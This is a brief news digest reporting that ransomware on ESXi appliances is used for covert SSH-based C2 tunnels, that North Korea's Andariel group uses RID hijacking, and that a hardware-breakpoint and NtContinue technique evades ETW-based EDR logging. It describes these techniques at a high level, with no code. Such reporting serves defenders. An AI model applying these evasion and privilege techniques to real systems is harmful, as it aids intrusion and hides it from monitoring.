Cybersecurity researchers have found that ransomware attacks on ESXi systems are not only encrypting data but also using compromised appliances as covert tunnels for C2 traffic, exploiting their resilience and low monitoring. Attackers gain access through stolen admin credentials or vulnerabilities, then establish SSH-based SOCKS tunnels for persistence. Sygnia recommends monitoring ESXi logs for detection. Meanwhile, North Korea's Andariel group is using RID hijacking to covertly grant administrative privileges to low-level Windows accounts, evading detection. Additionally, researchers have identified a new EDR evasion technique using hardware breakpoints and the NtContinue function to bypass ETW logging, allowing attackers to manipulate telemetry without kernel patching.

‍